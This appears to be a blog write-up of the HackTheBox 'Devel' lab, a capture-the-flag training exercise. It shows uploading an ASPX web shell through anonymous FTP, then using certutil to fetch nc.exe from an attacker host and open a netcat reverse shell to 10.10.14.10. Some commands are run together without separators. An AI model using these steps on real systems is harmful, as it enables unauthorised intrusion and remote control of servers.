HackTheBox:Devel

Today we will take a look at HackTheBox:Devel. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan
└─# nmap -Pn -p- -sCV --open -oN nmap/open 10.10.10.5
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
  • Reverse Shell

We see that the files on the site are here. Let’s upload in a webshell.

─# locate *aspx└─# cp /usr/share/davtest/backdoors/aspx_cmd.aspx .─# ftp 10.10.10.5                                                                                                                 
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put aspx_cmd.aspx
local: aspx_cmd.aspx remote: aspx_cmd.aspx
229 Entering Extended Passive Mode (|||49158|)
150 Opening ASCII mode data connection.
100% |***********************************************************************************************************************************************************************************************| 1438 22.11 MiB/s --:-- ETA
226 Transfer complete.
1438 bytes sent in 00:00 (8.94 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||49159|)
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
07-26-22 12:26PM 1438 aspx_cmd.aspx
03-17-17 05:37PM 689 iisstart.htm
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.

Let’s look at webshell.

Now let’s create temp folder. Upload nc.exe and start listening

cd c:\temp && certutil -urlcache -split -f http://10.10.14.10/nc.exe nc.exenc.exe 10.10.14.10 4444 -e cmd.exec:\temp\nc.exe 10.10.14.10 4444 -e cmd.exe
  • System

And now we are the system

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days